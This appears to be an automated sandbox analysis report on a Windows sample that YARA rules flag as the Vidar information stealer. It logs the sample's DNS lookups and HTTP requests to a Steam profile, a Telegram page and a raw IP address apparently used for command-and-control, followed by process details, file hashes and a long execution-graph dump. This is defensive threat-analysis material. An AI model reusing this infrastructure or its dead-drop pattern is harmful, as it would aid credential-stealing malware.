Oct 20, 2024 08:35:25.227597952 CEST | 49740 | 443 | 192.168.2.4 | 65.109.142.154
Oct 20, 2024 08:35:25.227890968 CEST | 49740 | 443 | 192.168.2.4 | 65.109.142.154
Oct 20, 2024 08:35:25.275440931 CEST | 443 | 49740 | 65.109.142.154 | 192.168.2.4
Oct 20, 2024 08:35:26.036815882 CEST | 443 | 49740 | 65.109.142.154 | 192.168.2.4
Oct 20, 2024 08:35:26.036871910 CEST | 443 | 49740 | 65.109.142.154 | 192.168.2.4
Oct 20, 2024 08:35:26.037066936 CEST | 49740 | 443 | 192.168.2.4 | 65.109.142.154
Oct 20, 2024 08:35:26.037128925 CEST | 49740 | 443 | 192.168.2.4 | 65.109.142.154
Oct 20, 2024 08:35:26.037146091 CEST | 443 | 49740 | 65.109.142.154 | 192.168.2.4
Oct 20, 2024 08:35:26.053841114 CEST | 49742 | 443 | 192.168.2.4 | 149.154.167.99
Oct 20, 2024 08:35:26.053865910 CEST | 443 | 49742 | 149.154.167.99 | 192.168.2.4
Oct 20, 2024 08:35:26.053931952 CEST | 49742 | 443 | 192.168.2.4 | 149.154.167.99
Oct 20, 2024 08:35:26.054133892 CEST | 49742 | 443 | 192.168.2.4 | 149.154.167.99
Oct 20, 2024 08:35:26.054147005 CEST | 443 | 49742 | 149.154.167.99 | 192.168.2.4
Oct 20, 2024 08:35:27.125178099 CEST | 443 | 49742 | 149.154.167.99 | 192.168.2.4
Oct 20, 2024 08:35:27.125292063 CEST | 49742 | 443 | 192.168.2.4 | 149.154.167.99
Oct 20, 2024 08:35:27.157351017 CEST | 49742 | 443 | 192.168.2.4 | 149.154.167.99
Oct 20, 2024 08:35:27.157367945 CEST | 443 | 49742 | 149.154.167.99 | 192.168.2.4
Oct 20, 2024 08:35:27.157695055 CEST | 443 | 49742 | 149.154.167.99 | 192.168.2.4
Oct 20, 2024 08:35:27.157772064 CEST | 49742 | 443 | 192.168.2.4 | 149.154.167.99
Oct 20, 2024 08:35:27.159262896 CEST | 49742 | 443 | 192.168.2.4 | 149.154.167.99
Oct 20, 2024 08:35:27.203414917 CEST | 443 | 49742 | 149.154.167.99 | 192.168.2.4
Oct 20, 2024 08:35:27.468785048 CEST | 443 | 49742 | 149.154.167.99 | 192.168.2.4
Oct 20, 2024 08:35:27.468821049 CEST | 443 | 49742 | 149.154.167.99 | 192.168.2.4
Oct 20, 2024 08:35:27.468842983 CEST | 49742 | 443 | 192.168.2.4 | 149.154.167.99
Oct 20, 2024 08:35:27.468873978 CEST | 49742 | 443 | 192.168.2.4 | 149.154.167.99
Oct 20, 2024 08:35:27.469053030 CEST | 49742 | 443 | 192.168.2.4 | 149.154.167.99
Oct 20, 2024 08:35:27.469072104 CEST | 443 | 49742 | 149.154.167.99 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 20, 2024 08:35:20.972177029 CEST | 52714 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 08:35:20.980287075 CEST | 53 | 52714 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 08:35:26.046403885 CEST | 63943 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 08:35:26.053251028 CEST | 53 | 63943 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 08:35:27.835844994 CEST | 56798 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 08:35:27.844980001 CEST | 53 | 56798 | 1.1.1.1 | 192.168.2.4
Oct 20, 2024 08:35:30.949796915 CEST | 53 | 58232 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 20, 2024 08:35:20.972177029 CEST | 192.168.2.4 | 1.1.1.1 | 0x166a | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:35:26.046403885 CEST | 192.168.2.4 | 1.1.1.1 | 0x665d | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:35:27.835844994 CEST | 192.168.2.4 | 1.1.1.1 | 0x5e77 | Standard query (0) | cowod.hopto.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 20, 2024 08:35:20.980287075 CEST | 1.1.1.1 | 192.168.2.4 | 0x166a | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Oct 20, 2024 08:35:26.053251028 CEST | 1.1.1.1 | 192.168.2.4 | 0x665d | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• 65.109.142.154
• t.me
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 104.102.49.254 | 443 | 7336 | C:\Users\user\Desktop\aZm1EZ2IYr.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-20 06:35:23 UTC | 119 | OUT | GET /profiles/76561199786602107 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-20 06:35:23 UTC | 1917 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sun, 20 Oct 2024 06:35:23 GMT
                                                                                                                                                                      Content-Length: 35803
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: sessionid=90a529e697100d7490088596; Path=/; Secure; SameSite=None
                                                                                                                                                                      Set-Cookie: steamCountry=US%7C0e3d185a3e106e73b244decdec33a0ea; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                      2024-10-20 06:35:23 UTC14467INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                      2024-10-20 06:35:23 UTC16384INData Raw: 09 09 09 48 6f 6d 65 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61
                                                                                                                                                                      Data Ascii: Home</a><a class="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a
                                                                                                                                                                      2024-10-20 06:35:23 UTC3768INData Raw: 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 66 65 66 34 39 65 37 66 61 37 65 31 39 39 37 33 31 30 64 37 30 35 62 32 61 36 31 35 38 66 66 38 64 63 31 63 64 66 65 62 5f 66 75 6c 6c 2e 6a 70 67 22 3e 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 22 3e 0d 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 5f 62 61 64 67 65 5f 61 72 65 61 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63
                                                                                                                                                                      Data Ascii: s.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg"></div></div><div class="profile_header_badgeinfo"><div class="profile_header_badgeinfo_badge_area"><a data-panel="{&quot;foc


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49740        65.109.142.154  443               7336  C:\Users\user\Desktop\aZm1EZ2IYr.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-20 06:35:25 UTC  187                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 65.109.142.154
    Connection: Keep-Alive
    Cache-Control: no-cache


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49742        149.154.167.99  443               7336  C:\Users\user\Desktop\aZm1EZ2IYr.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-20 06:35:27 UTC  86                 OUT        GET /lpnjoke HTTP/1.1
    Host: t.me
    Connection: Keep-Alive
    Cache-Control: no-cache


Target ID: 0
Start time: 02:34:56
Start date: 20/10/2024
Path: C:\Users\user\Desktop\aZm1EZ2IYr.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\aZm1EZ2IYr.exe"
Imagebase: 0x180000
File size: 392'704 bytes
MD5 hash: 1E1D5412616216FD90EA3CB6A87353DB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000000.1668857258.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.1668857258.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 6
Start time: 02:35:26
Start date: 20/10/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 2220
Imagebase: 0xb70000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 02:35:27
Start date: 20/10/2024
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 2384
Imagebase: 0xb70000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 13.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4.9%
Total number of Nodes: 2000
Total number of Limit Nodes: 22
21325->21326 21327 1847e8 3 API calls 21326->21327 21328 1830df 21327->21328 21329 1847e8 3 API calls 21328->21329 21330 1830f6 21329->21330 21331 1847e8 3 API calls 21330->21331 21332 18310f 21331->21332 21333 1847e8 3 API calls 21332->21333 21334 183123 21333->21334 21335 1847e8 3 API calls 21334->21335 21336 18313a 21335->21336 21337 1847e8 3 API calls 21336->21337 21338 183154 21337->21338 21339 1847e8 3 API calls 21338->21339 21340 18316b 21339->21340 21341 1847e8 3 API calls 21340->21341 21342 183182 21341->21342 21343 1847e8 3 API calls 21342->21343 21344 183199 21343->21344 21345 1847e8 3 API calls 21344->21345 21346 1831af 21345->21346 21347 1847e8 3 API calls 21346->21347 21348 1831c5 21347->21348 21349 1847e8 3 API calls 21348->21349 21350 1831dc 21349->21350 21351 1847e8 3 API calls 21350->21351 21352 1831f2 21351->21352 21353 1847e8 3 API calls 21352->21353 21354 18320c 21353->21354 21355 1847e8 3 API calls 21354->21355 21356 183223 21355->21356 21357 1847e8 3 API calls 21356->21357 21358 18323a 21357->21358 21359 1847e8 3 API calls 21358->21359 21360 183250 21359->21360 21361 1847e8 3 API calls 21360->21361 21362 183267 21361->21362 21363 1847e8 3 API calls 21362->21363 21364 18327e 21363->21364 21365 1847e8 3 API calls 21364->21365 21366 183295 21365->21366 21367 1847e8 3 API calls 21366->21367 21368 1832ab 21367->21368 21369 1847e8 3 API calls 21368->21369 21370 1832c2 21369->21370 21371 1847e8 3 API calls 21370->21371 21372 1832d9 21371->21372 21373 1847e8 3 API calls 21372->21373 21374 1832f0 21373->21374 21375 1847e8 3 API calls 21374->21375 21376 183306 21375->21376 21377 1847e8 3 API calls 21376->21377 21378 18331c 21377->21378 21379 1847e8 3 API calls 21378->21379 21380 183333 21379->21380 21381 1847e8 3 API calls 21380->21381 21382 183349 21381->21382 21383 1847e8 3 API calls 21382->21383 21384 18335d 21383->21384 21385 1847e8 3 API calls 21384->21385 21386 183374 21385->21386 21387 1847e8 3 API calls 21386->21387 21388 18338a 21387->21388 
21389 1847e8 3 API calls 21388->21389 21390 1833a1 21389->21390 21391 1847e8 3 API calls 21390->21391 21392 1833b8 21391->21392 21393 1847e8 3 API calls 21392->21393 21394 1833cf 21393->21394 21395 1847e8 3 API calls 21394->21395 21396 1833e6 21395->21396 21397 1847e8 3 API calls 21396->21397 21398 1833fd 21397->21398 21399 1847e8 3 API calls 21398->21399 21400 183414 21399->21400 21401 1847e8 3 API calls 21400->21401 21402 18342e 21401->21402 21403 1847e8 3 API calls 21402->21403 21404 183445 21403->21404 21405 1847e8 3 API calls 21404->21405 21406 18345c 21405->21406 21407 1847e8 3 API calls 21406->21407 21408 183473 21407->21408 21409 1847e8 3 API calls 21408->21409 21410 18348a 21409->21410 21411 1847e8 3 API calls 21410->21411 21412 1834a1 21411->21412 21413 1847e8 3 API calls 21412->21413 21414 1834b8 21413->21414 21415 1847e8 3 API calls 21414->21415 21416 1834cf 21415->21416 21417 1847e8 3 API calls 21416->21417 21418 1834e9 21417->21418 21419 1847e8 3 API calls 21418->21419 21420 183500 21419->21420 21421 1847e8 3 API calls 21420->21421 21422 183517 21421->21422 21423 1847e8 3 API calls 21422->21423 21424 18352e 21423->21424 21425 1847e8 3 API calls 21424->21425 21426 183545 21425->21426 21427 1847e8 3 API calls 21426->21427 21428 18355c 21427->21428 21429 1847e8 3 API calls 21428->21429 21430 183573 21429->21430 21431 1847e8 3 API calls 21430->21431 21432 18358a 21431->21432 21433 1847e8 3 API calls 21432->21433 21434 1835a4 21433->21434 21435 1847e8 3 API calls 21434->21435 21436 1835bb 21435->21436 21437 1847e8 3 API calls 21436->21437 21438 1835d2 21437->21438 21439 1847e8 3 API calls 21438->21439 21440 1835e9 21439->21440 21441 1847e8 3 API calls 21440->21441 21442 183600 21441->21442 21443 1847e8 3 API calls 21442->21443 21444 183617 21443->21444 21445 1847e8 3 API calls 21444->21445 21446 18362d 21445->21446 21447 1847e8 3 API calls 21446->21447 21448 183643 21447->21448 21449 1847e8 3 API calls 21448->21449 21450 18365d 21449->21450 21451 1847e8 3 
API calls 21450->21451 21452 183674 21451->21452 21453 1847e8 3 API calls 21452->21453 21454 18368b 21453->21454 21455 1847e8 3 API calls 21454->21455 21456 1836a1 21455->21456 21457 1847e8 3 API calls 21456->21457 21458 1836b8 21457->21458 21459 1847e8 3 API calls 21458->21459 21460 1836cf 21459->21460 21461 1847e8 3 API calls 21460->21461 21462 1836e3 21461->21462 21463 1847e8 3 API calls 21462->21463 21464 1836f9 21463->21464 21465 1847e8 3 API calls 21464->21465 21466 183713 21465->21466 21467 1847e8 3 API calls 21466->21467 21468 18372a 21467->21468 21469 1847e8 3 API calls 21468->21469 21470 183741 21469->21470 21471 1847e8 3 API calls 21470->21471 21472 183758 21471->21472 21473 1847e8 3 API calls 21472->21473 21474 18376f 21473->21474 21475 1847e8 3 API calls 21474->21475 21476 183786 21475->21476 21477 1847e8 3 API calls 21476->21477 21478 18379a 21477->21478 21479 1847e8 3 API calls 21478->21479 21480 1837b1 21479->21480 21481 1847e8 3 API calls 21480->21481 21482 1837cb 21481->21482 21483 1847e8 3 API calls 21482->21483 21484 1837e2 21483->21484 21485 1847e8 3 API calls 21484->21485 21486 1837f6 21485->21486 21487 1847e8 3 API calls 21486->21487 21488 18380a 21487->21488 21489 1847e8 3 API calls 21488->21489 21490 183821 21489->21490 21491 1847e8 3 API calls 21490->21491 21492 183838 21491->21492 21493 1847e8 3 API calls 21492->21493 21494 18384f 21493->21494 21495 1847e8 3 API calls 21494->21495 21496 183866 21495->21496 21497 1847e8 3 API calls 21496->21497 21498 183880 21497->21498 21499 1847e8 3 API calls 21498->21499 21500 183897 21499->21500 21501 1847e8 3 API calls 21500->21501 21502 1838ae 21501->21502 21503 1847e8 3 API calls 21502->21503 21504 1838c5 21503->21504 21505 1847e8 3 API calls 21504->21505 21506 1838db 21505->21506 21507 1847e8 3 API calls 21506->21507 21508 1838f2 21507->21508 21509 1847e8 3 API calls 21508->21509 21510 183906 21509->21510 21511 1847e8 3 API calls 21510->21511 21512 18391d 21511->21512 21513 1847e8 3 API calls 
21512->21513 21514 183937 21513->21514 21515 1847e8 3 API calls 21514->21515 21516 18394e 21515->21516 21517 1847e8 3 API calls 21516->21517 21518 183965 21517->21518 21519 1847e8 3 API calls 21518->21519 21520 18397c 21519->21520 21521 1847e8 3 API calls 21520->21521 21522 183993 21521->21522 21523 1847e8 3 API calls 21522->21523 21524 1839aa 21523->21524 21525 1847e8 3 API calls 21524->21525 21526 1839c1 21525->21526 21527 1847e8 3 API calls 21526->21527 21528 1839d8 21527->21528 21529 1847e8 3 API calls 21528->21529 21530 1839f2 21529->21530 21531 1847e8 3 API calls 21530->21531 21532 183a09 21531->21532 21533 1847e8 3 API calls 21532->21533 21534 183a20 21533->21534 21535 1847e8 3 API calls 21534->21535 21536 183a37 21535->21536 21537 1847e8 3 API calls 21536->21537 21538 183a4e 21537->21538 21539 1847e8 3 API calls 21538->21539 21540 183a65 21539->21540 21541 1847e8 3 API calls 21540->21541 21542 183a7c 21541->21542 21543 1847e8 3 API calls 21542->21543 21544 183a90 21543->21544 21545 1847e8 3 API calls 21544->21545 21546 183aaa 21545->21546 21547 1847e8 3 API calls 21546->21547 21548 183ac1 21547->21548 21549 1847e8 3 API calls 21548->21549 21550 183ad7 21549->21550 21551 1847e8 3 API calls 21550->21551 21552 183aee 21551->21552 21553 1847e8 3 API calls 21552->21553 21554 183b05 21553->21554 21555 1847e8 3 API calls 21554->21555 21556 183b1c 21555->21556 21557 1847e8 3 API calls 21556->21557 21558 183b33 21557->21558 21559 1847e8 3 API calls 21558->21559 21560 183b4a 21559->21560 21561 1847e8 3 API calls 21560->21561 21562 183b61 21561->21562 21563 1847e8 3 API calls 21562->21563 21564 183b75 21563->21564 21565 1847e8 3 API calls 21564->21565 21566 183b8c 21565->21566 21567 1847e8 3 API calls 21566->21567 21568 183ba3 21567->21568 21569 1847e8 3 API calls 21568->21569 21570 183bba 21569->21570 21571 1847e8 3 API calls 21570->21571 21572 183bd1 21571->21572 21573 1847e8 3 API calls 21572->21573 21574 183be8 21573->21574 21575 1847e8 3 API calls 21574->21575 
21576 183bff 21575->21576 21577 1847e8 3 API calls 21576->21577 21578 183c19 21577->21578 21579 1847e8 3 API calls 21578->21579 21580 183c30 21579->21580 21581 1847e8 3 API calls 21580->21581 21582 183c47 21581->21582 21583 1847e8 3 API calls 21582->21583 21584 183c5e 21583->21584 21585 1847e8 3 API calls 21584->21585 21586 183c75 21585->21586 21587 1847e8 3 API calls 21586->21587 21588 183c8c 21587->21588 21589 1847e8 3 API calls 21588->21589 21590 183ca3 21589->21590 21591 1847e8 3 API calls 21590->21591 21592 183cb7 21591->21592 21593 1847e8 3 API calls 21592->21593 21594 183cd1 21593->21594 21595 1847e8 3 API calls 21594->21595 21596 183ce8 21595->21596 21597 1847e8 3 API calls 21596->21597 21598 183cff 21597->21598 21599 1847e8 3 API calls 21598->21599 21600 183d16 21599->21600 21601 1847e8 3 API calls 21600->21601 21602 183d2c 21601->21602 21603 1847e8 3 API calls 21602->21603 21604 183d43 21603->21604 21605 1847e8 3 API calls 21604->21605 21606 183d57 21605->21606 21607 1847e8 3 API calls 21606->21607 21608 183d6e 21607->21608 21609 1847e8 3 API calls 21608->21609 21610 183d85 21609->21610 21611 1847e8 3 API calls 21610->21611 21612 183d9c 21611->21612 21613 1847e8 3 API calls 21612->21613 21614 183db3 21613->21614 21615 1847e8 3 API calls 21614->21615 21616 183dca 21615->21616 21617 1847e8 3 API calls 21616->21617 21618 183de1 21617->21618 21619 1847e8 3 API calls 21618->21619 21620 183df8 21619->21620 21621 1847e8 3 API calls 21620->21621 21622 183e0f 21621->21622 21623 1847e8 3 API calls 21622->21623 21624 183e26 21623->21624 21625 1847e8 3 API calls 21624->21625 21626 183e40 21625->21626 21627 1847e8 3 API calls 21626->21627 21628 183e57 21627->21628 21629 1847e8 3 API calls 21628->21629 21630 183e6e 21629->21630 21631 1847e8 3 API calls 21630->21631 21632 183e84 21631->21632 21633 1847e8 3 API calls 21632->21633 21634 183e9b 21633->21634 21635 1847e8 3 API calls 21634->21635 21636 183eb2 21635->21636 21637 1847e8 3 API calls 21636->21637 21638 183ec9 
21637->21638 21639 1847e8 3 API calls 21638->21639 21640 183ee0 21639->21640 21641 1847e8 3 API calls 21640->21641 21642 183efa 21641->21642 21643 1847e8 3 API calls 21642->21643 21644 183f10 21643->21644 21645 1847e8 3 API calls 21644->21645 21646 183f27 21645->21646 21647 1847e8 3 API calls 21646->21647 21648 183f3e 21647->21648 21649 1847e8 3 API calls 21648->21649 21650 183f55 21649->21650 21651 1847e8 3 API calls 21650->21651 21652 183f6c 21651->21652 21653 1847e8 3 API calls 21652->21653 21654 183f80 21653->21654 21655 1847e8 3 API calls 21654->21655 21656 183f97 21655->21656 21657 1847e8 3 API calls 21656->21657 21658 183fb1 21657->21658 21659 1847e8 3 API calls 21658->21659 21660 183fc7 21659->21660 21661 1847e8 3 API calls 21660->21661 21662 183fde 21661->21662 21663 1847e8 3 API calls 21662->21663 21664 183ff2 21663->21664 21665 1847e8 3 API calls 21664->21665 21666 184009 21665->21666 21667 1847e8 3 API calls 21666->21667 21668 184020 21667->21668 21669 1847e8 3 API calls 21668->21669 21670 184037 21669->21670 21671 1847e8 3 API calls 21670->21671 21672 18404e 21671->21672 21673 1847e8 3 API calls 21672->21673 21674 184067 21673->21674 21675 1847e8 3 API calls 21674->21675 21676 18407e 21675->21676 21677 1847e8 3 API calls 21676->21677 21678 184094 21677->21678 21679 1847e8 3 API calls 21678->21679 21680 1840a8 21679->21680 21681 1847e8 3 API calls 21680->21681 21682 1840bf 21681->21682 21683 1847e8 3 API calls 21682->21683 21684 1840d6 21683->21684 21685 1847e8 3 API calls 21684->21685 21686 1840ed 21685->21686 21687 1847e8 3 API calls 21686->21687 21688 184104 21687->21688 21689 1847e8 3 API calls 21688->21689 21690 18411e 21689->21690 21691 1847e8 3 API calls 21690->21691 21692 184135 21691->21692 21693 1847e8 3 API calls 21692->21693 21694 18414c 21693->21694 21695 1847e8 3 API calls 21694->21695 21696 184163 21695->21696 21697 1847e8 3 API calls 21696->21697 21698 184179 21697->21698 21699 1847e8 3 API calls 21698->21699 21700 18418d 21699->21700 
21701 1847e8 3 API calls 21700->21701 21702 1841a1 21701->21702 21703 1847e8 3 API calls 21702->21703 21704 1841b8 21703->21704 21705 1847e8 3 API calls 21704->21705 21706 1841d2 21705->21706 21707 1847e8 3 API calls 21706->21707 21708 1841e8 21707->21708 21709 1847e8 3 API calls 21708->21709 21710 1841ff 21709->21710 21711 1847e8 3 API calls 21710->21711 21712 184216 21711->21712 21713 1847e8 3 API calls 21712->21713 21714 18422d 21713->21714 21715 1847e8 3 API calls 21714->21715 21716 184244 21715->21716 21717 1847e8 3 API calls 21716->21717 21718 184258 21717->21718 21719 1847e8 3 API calls 21718->21719 21720 18426e 21719->21720 21721 1847e8 3 API calls 21720->21721 21722 184288 21721->21722 21723 1847e8 3 API calls 21722->21723 21724 18429f 21723->21724 21725 1847e8 3 API calls 21724->21725 21726 1842b6 21725->21726 21727 1847e8 3 API calls 21726->21727 21728 1842cc 21727->21728 21729 1847e8 3 API calls 21728->21729 21730 1842e3 21729->21730 21731 1847e8 3 API calls 21730->21731 21732 1842fa 21731->21732 21733 1847e8 3 API calls 21732->21733 21734 184311 21733->21734 21735 1847e8 3 API calls 21734->21735 21736 184325 21735->21736 21737 1847e8 3 API calls 21736->21737 21738 18433c 21737->21738 21739 1847e8 3 API calls 21738->21739 21740 184353 21739->21740 21741 1847e8 3 API calls 21740->21741 21742 18436a 21741->21742 21743 1847e8 3 API calls 21742->21743 21744 184381 21743->21744 21745 1847e8 3 API calls 21744->21745 21746 184395 21745->21746 21747 1847e8 3 API calls 21746->21747 21748 1843ac 21747->21748 21749 1847e8 3 API calls 21748->21749 21750 1843c3 21749->21750 21751 1847e8 3 API calls 21750->21751 21752 1843da 21751->21752 21753 1847e8 3 API calls 21752->21753 21754 1843f1 21753->21754 21755 1847e8 3 API calls 21754->21755 21756 184408 21755->21756 21757 1847e8 3 API calls 21756->21757 21758 18441c 21757->21758 21759 1847e8 3 API calls 21758->21759 21760 184433 21759->21760 21761 1847e8 3 API calls 21760->21761 21762 18444a 21761->21762 21763 1847e8 3 
API calls 21762->21763 21764 18445e 21763->21764 21765 1847e8 3 API calls 21764->21765 21766 184472 21765->21766 21767 1847e8 3 API calls 21766->21767 21768 184486 21767->21768 21769 1847e8 3 API calls 21768->21769 21770 1844a0 21769->21770 21771 1847e8 3 API calls 21770->21771 21772 1844b7 21771->21772 21773 1847e8 3 API calls 21772->21773 21774 1844cd 21773->21774 21775 1847e8 3 API calls 21774->21775 21776 1844e4 21775->21776 21777 1847e8 3 API calls 21776->21777 21778 1844fa 21777->21778 21779 1847e8 3 API calls 21778->21779 21780 184511 21779->21780 21781 1847e8 3 API calls 21780->21781 21782 184528 21781->21782 21783 1847e8 3 API calls 21782->21783 21784 18453e 21783->21784 21785 1847e8 3 API calls 21784->21785 21786 184558 21785->21786 21787 1847e8 3 API calls 21786->21787 21788 18456f 21787->21788 21789 1847e8 3 API calls 21788->21789 21790 184586 21789->21790 21791 1847e8 3 API calls 21790->21791 21792 18459d 21791->21792 21793 1847e8 3 API calls 21792->21793 21794 1845b4 21793->21794 21795 1847e8 3 API calls 21794->21795 21796 1845cb 21795->21796 21797 1847e8 3 API calls 21796->21797 21798 1845e2 21797->21798 21799 1847e8 3 API calls 21798->21799 21800 1845f9 